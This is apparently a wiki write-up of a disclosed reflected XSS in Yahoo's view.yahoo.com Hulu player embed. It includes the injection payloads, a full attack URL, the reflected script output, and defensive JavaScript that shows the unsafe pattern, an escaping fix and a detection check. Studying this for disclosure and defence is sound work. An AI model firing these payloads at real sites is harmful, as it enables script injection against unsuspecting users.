XSS at view.yahoo.com

From Hackipedia
OpenBugBounty #186099
Target: Yahoo.com
Target Module: view.yahoo.com
Type: XSS
Original Link
Payload </title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>

A reflected XSS was reported by Spam404 to OpenBugBounty.

The injection point was in a social-site button script that builds a Hulu player box on the page. Social buttons are usually added as an afterthought and are not part of the regular application construction, so social-site buttons/links are much more likely to be subject to injection and should be given a second look.

The payload used excessive escapes, as is typical of automated scanners (bots).

Because the value is reflected unescaped inside a single-quoted JavaScript string in an inline script, some smaller payloads would also have worked:

'*alert(1)*'
</script><svg onload=alert(1)>

Attack URL:

https://view.yahoo.com/embed/player?shareUrl=</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>

Result:

    <script nonce=8cbceb41-e3e3-40d2-aaab-67920bd94841 type="text/javascript">
        window.HuluPlayerConfig = {
            enable_end_card: false,
            enable_autoplay: true,
            enable_share: true,
            enable_age_gate: true,
            enable_mature_intro: true,
            embed_age_gate_intro: true,
            countdown_time: 0,
            facebook_share_link: '</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>?utm_source=facebook&utm_medium=referral&utm_campaign=desktop_player',
            twitter_share_link: '</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>?utm_source=twitter&utm_medium=referral&utm_campaign=desktop_player',
            embed_code: '',
            hide_embed_button: true,
            video_link: '</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>',
            up_next: [],
        };
    </script>
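As an added example (not Yahoo's or Hulu's code), here is the pattern behind this bug and its fix: raw interpolation of `shareUrl` into a single-quoted literal beside an encoder that makes the value safe to embed in an inline `<script>`. The function names are mine, and the one-field config is a cut-down stand-in for the page's `HuluPlayerConfig`.

```javascript
// Constructed from the payload quoted on this page.
const PAYLOAD = `</title></script/'-alert(0)-'"-"-->"><svg/onload=prompt(/OPENBUGBOUNTY/)>`;

// Vulnerable pattern: the parameter is dropped into a single-quoted JS
// string literal. A quote ends the literal, and the HTML parser ends the
// whole script at the first "</script" regardless of JS string state.
function renderConfigUnsafe(shareUrl) {
  return `window.HuluPlayerConfig = { video_link: '${shareUrl}' };`;
}

// Safe encoder: JSON.stringify yields a valid JS string literal (quotes and
// backslashes escaped); the extra replacements stop the HTML parser from
// seeing "</script" or "<!--", and neutralise U+2028/2029, which older
// engines treat as line terminators inside a literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderConfigSafe(shareUrl) {
  return `window.HuluPlayerConfig = { video_link: ${jsStringLiteral(shareUrl)} };`;
}

// Review/detection check for a rendered inline script body: a closing
// script tag inside the body means the template lets input end the script.
function breaksOutOfScript(scriptBody) {
  return /<\/script/i.test(scriptBody);
}

// Lossless check: evaluating the encoded literal gives back the original.
function roundTrip(value) {
  return new Function(`return ${jsStringLiteral(value)};`)();
}

// Stand-alone demonstration.
console.log('unsafe breaks out:', breaksOutOfScript(renderConfigUnsafe(PAYLOAD))); // true
console.log('safe breaks out:  ', breaksOutOfScript(renderConfigSafe(PAYLOAD)));   // false
console.log('round trip ok:    ', roundTrip(PAYLOAD) === PAYLOAD);                // true
```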